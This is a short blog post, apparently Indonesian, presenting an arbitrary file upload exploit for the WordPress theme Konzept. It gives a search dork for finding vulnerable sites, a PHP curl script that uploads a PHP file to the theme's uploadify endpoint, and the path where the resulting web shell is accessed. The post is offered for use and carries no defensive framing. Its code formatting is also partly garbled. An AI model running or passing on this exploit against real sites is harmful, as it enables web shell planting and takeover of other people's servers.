WordPress Theme Konzept Arbitrary File Upload Vulnerability


Dork:  inurl:/wp-content/themes/konzept/ 

Exploit :
<?php

$url 
"http://127.0.0.1"// put URL Here$post = array
(
        
"file" => "@null_pointer.jpg",
        
"name" => "null_pointer.php");$ch curl_init ("$url/wp-content/themes/konzept/includes/uploadify/upload.php");curl_setopt ($chCURLOPT_RETURNTRANSFER1);curl_setopt ($chCURLOPT_FOLLOWLOCATION1);curl_setopt ($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");curl_setopt ($chCURLOPT_CONNECTTIMEOUT5);curl_setopt ($chCURLOPT_SSL_VERIFYPEER0);curl_setopt ($chCURLOPT_SSL_VERIFYHOST0);curl_setopt ($chCURLOPT_POST1);
@
curl_setopt ($chCURLOPT_POSTFIELDS$post);$data curl_exec ($ch);curl_close ($ch);

echo 
$data;?>
Shell Akses : http://127.0.0.1/wp-content/themes/konzept/includes/uploadify/uploads/yours.php
WordPress Theme Konzept Arbitrary File Upload Vulnerability WordPress Theme Konzept Arbitrary File Upload Vulnerability Reviewed by Izza009 on 05.00 Rating: 5

Tidak ada komentar:

Diberdayakan oleh Blogger.